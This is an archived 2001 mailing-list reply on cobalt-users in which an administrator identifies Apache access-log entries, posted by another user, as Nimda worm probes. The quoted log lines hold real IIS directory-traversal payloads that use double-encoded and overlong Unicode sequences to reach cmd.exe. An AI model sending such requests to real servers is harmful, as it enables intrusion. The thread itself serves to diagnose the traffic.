[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [cobalt-users] access log weird stuff. hacker or virus

Subject: Re: [cobalt-users] access log weird stuff. hacker or virus
From: Marco Baurdoux <linux@xxxxxxxxxxxxx>
Date: Thu Sep 27 16:07:11 2001
List-id: Mailing list for users to share thoughts on Cobalt products. <cobalt-users.list.cobalt.com>

le 28.9.2001 6:45, brain_damaged à brain_damaged@xxxxxxxxxxxxxxxxxxxx a
écrit :

> Hello,
> I went and check my access log and see this stuff.
> Looking for winnt on a linux system ?
> 
> 
> tail access
> www.florida-wireless.com 208.62.153.5 - - [28/Sep/2001:00:30:17 -0400] "GET
> /_me
> m_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
> 302
> 280 "-" "-"
> www.florida-wireless.com 208.62.153.5 - - [28/Sep/2001:00:30:17 -0400] "GET
> /msa
> dc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32
> /c
> md.exe?/c+dir HTTP/1.0" 302 308 "-" "-"
> www.florida-wireless.com 208.62.153.5 - - [28/Sep/2001:00:30:18 -0400] "GET
> /scr
> ipts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 260 "-" "-"
> www.florida-wireless.com 208.62.153.5 - - [28/Sep/2001:00:30:18 -0400] "GET
> /scr
> ipts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 235 "-" "-"
> www.florida-wireless.com 208.62.153.5 - - [28/Sep/2001:00:30:18 -0400] "GET
> /scr
> ipts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 260 "-" "-"
> www.florida-wireless.com 208.62.153.5 - - [28/Sep/2001:00:30:18 -0400] "GET
> /scr
> ipts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 260 "-" "-"
> www.florida-wireless.com 208.62.153.5 - - [28/Sep/2001:00:30:18 -0400] "GET
> /scr
> ipts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
> www.florida-wireless.com 208.62.153.5 - - [28/Sep/2001:00:30:18 -0400] "GET
> /scr
> ipts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
> www.florida-wireless.com 208.62.153.5 - - [28/Sep/2001:00:30:18 -0400] "GET
> /scr
> ipts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 259 "-" "-"
> www.florida-wireless.com 208.62.153.5 - - [28/Sep/2001:00:30:18 -0400] "GET
> /scr
> ipts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 259 "-" "-"
> [root httpd]#    

looks very much like nimda !!
You missed the wave .-))

=======================================================================

Marco Baurdoux
Unix Administrator
Infomaniak Network SA
Avenue de la Praille 26
1227 Carouge
Switzerland
Tel: +41 (0)22 820 35 41
Fax: +41 (0)22 820 35 46
http://web.infomaniak.ch

Linux/Unix is very user friendly,
it's just very picky about who its friends are !!!

=======================================================================

References:
- [cobalt-users] access log weird stuff. hacker or virus
  - From: brain_damaged

Prev by Date: Re: [cobalt-users] Still problems with virtual domain on RaQ2
Next by Date: [cobalt-users] named crashes up to six times a week
Previous by thread: Re: [cobalt-users] access log weird stuff. hacker or virus
Next by thread: RE: [cobalt-users] access log weird stuff. hacker or virus

Sun Cobalt Users Message Index

Sun Cobalt Users Thread Index